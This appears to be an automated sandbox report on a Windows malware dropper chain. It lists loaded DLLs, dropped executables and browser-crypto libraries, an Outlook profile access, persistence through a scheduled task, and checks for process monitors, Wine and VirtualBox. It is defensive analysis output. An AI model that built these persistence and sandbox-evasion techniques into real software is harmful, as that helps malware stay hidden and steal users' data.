Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5146112 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of bvxvctom is bigger than: 0x100000 < 0x29bc00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.520000.0.unpack :EW;.rsrc:W;.idata :W;bvxvctom:EW;uxtgkroo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bvxvctom:EW;uxtgkroo:EW;.taggant:EW;
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Unpacked PE file: 20.2.DGCAAFBFBK.exe.7d0000.0.unpack :EW;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 23.2.skotes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;bndlrsnx:EW;myoyjplj:EW;.taggant:EW;

Source: JoYUT4N[1].exe.23.dr

Static PE information: 0xF5BFB335 [Thu Aug 26 16:32:53 2100 UTC]

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C953480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,

0_2_6C953480

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: JoYUT4N.exe.23.dr	Static PE information: real checksum: 0x0 should be: 0x7c2d4
Source: DGCAAFBFBK.exe.0.dr	Static PE information: real checksum: 0x323c00 should be: 0x322e9b
Source: JoYUT4N[1].exe.23.dr	Static PE information: real checksum: 0x0 should be: 0x7c2d4
Source: file.exe	Static PE information: real checksum: 0x4ec4ef should be: 0x4ea815
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x323c00 should be: 0x322e9b
Source: skotes.exe.20.dr	Static PE information: real checksum: 0x323c00 should be: 0x322e9b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: bvxvctom
Source: file.exe	Static PE information: section name: uxtgkroo
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: bndlrsnx
Source: random[1].exe.0.dr	Static PE information: section name: myoyjplj
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name:
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: .idata
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: bndlrsnx
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: myoyjplj
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name: bndlrsnx
Source: skotes.exe.20.dr	Static PE information: section name: myoyjplj
Source: skotes.exe.20.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C98B536 push ecx; ret	0_2_6C98B549
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_007ED91C push ecx; ret	20_2_007ED92F
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Code function: 20_2_007E1359 push es; ret	20_2_007E135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00B1D91C push ecx; ret	21_2_00B1D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B1D91C push ecx; ret	23_2_00B1D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B1DFC6 push ecx; ret	23_2_00B1DFD9

Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.097795980640664
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: entropy: 7.097795980640664
Source: skotes.exe.20.dr	Static PE information: section name: entropy: 7.097795980640664

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\DGCAAFBFBK.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\DGCAAFBFBK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C9B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6C9B55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

